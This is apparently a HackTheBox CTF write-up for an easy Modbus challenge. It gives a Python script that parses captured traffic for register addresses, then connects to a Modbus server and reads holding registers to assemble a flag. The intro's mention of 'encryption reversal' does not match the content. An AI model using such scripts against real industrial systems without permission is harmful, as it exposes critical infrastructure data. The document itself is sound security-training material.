HackTheBox Intrusion Writeup
Explore the basics of cybersecurity in the Intrusion Challenge on Hack The Box. This easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.
https://app.hackthebox.com/challenges/525
Description
After gaining access to the enemy’s infrastructure, we collected crucial network traffic data from their Modbus network. Our primary objective is to swiftly identify the specific registers containing highly sensitive information and extract that data.
Exploitation
network_logs.pcapng is parsed with:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
#!/usr/bin/python3
import socket
import sys
from time import sleep
from umodbus import conf
from umodbus.client import tcp
from scapy.all import rdpcap, TCP
conf.SIGNED_VALUES = True
if len(sys.argv) != 2:
print(f"Usage: {sys.argv[0]} <ip:port>")
sys.exit(1)
try:
ip, port = sys.argv[1].split(":")
port = int(port)
except ValueError:
print("Error: Invalid format for IP and port. Use <ip:port> format.")
sys.exit(1)
PCAP_FILE = "network_logs.pcapng"
def extract_modbus_commands_and_registers(pcap_file):
packets = rdpcap(pcap_file)
modbus_commands = []
register_addresses = []
for pkt in packets:
if TCP in pkt:
payload = bytes(pkt[TCP].payload).hex()
if "34" in payload:
modbus_commands.append(payload)
if len(payload) >= len("91ed00000006341000060001"):
packet = payload[-10:]
if packet.startswith("10"):
register_addr = int(packet[-6:-4], 16)
register_addresses.append(register_addr)
return modbus_commands, register_addresses
def main():
print("[*] Parsing Modbus commands and register addresses from the PCAP file...")
modbus_commands, register_addresses = extract_modbus_commands_and_registers(PCAP_FILE)
print("[*] Extracted Modbus Commands:")
for cmd in modbus_commands:
print(cmd)
print("\n[*] Register Addresses:")
print(register_addresses)
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, port))
print(f"Connected to Modbus server at {ip}:{port}")
except Exception as e:
print(f"Failed to connect to {ip}:{port} - {e}")
sys.exit(1)
flag = ""
try:
for address in register_addresses:
command = tcp.read_holding_registers(52, address, 1)
response = tcp.send_message(command, sock)
if isinstance(response, list) and response:
value = response[0]
flag += chr(value)
print(f"Register {address}: {value} -> {chr(value)}")
else:
print(f"Failed to read register {address}: {response}")
sleep(0.1)
except Exception as e:
print(f"Error during Modbus communication: {e}")
finally:
sock.close()
print("Connection closed.")
print(f"Retrieved flag: {flag}")
if __name__ == "__main__":
main()
Summary
The Intrusion Challenge at Hack The Box introduces participants to the fundamentals of hardware and network protocol security through the analysis of Modbus network traffic. This easy-level challenge emphasizes parsing, interaction with a Modbus server, and retrieving sensitive information stored in registers. By focusing on real-world applications of the Modbus protocol, the challenge delivers a practical learning experience, blending hardware-level insights with Python scripting to interact with industrial systems. It’s an excellent entry point for beginners to explore hardware security and network traffic analysis in a hands-on and engaging way.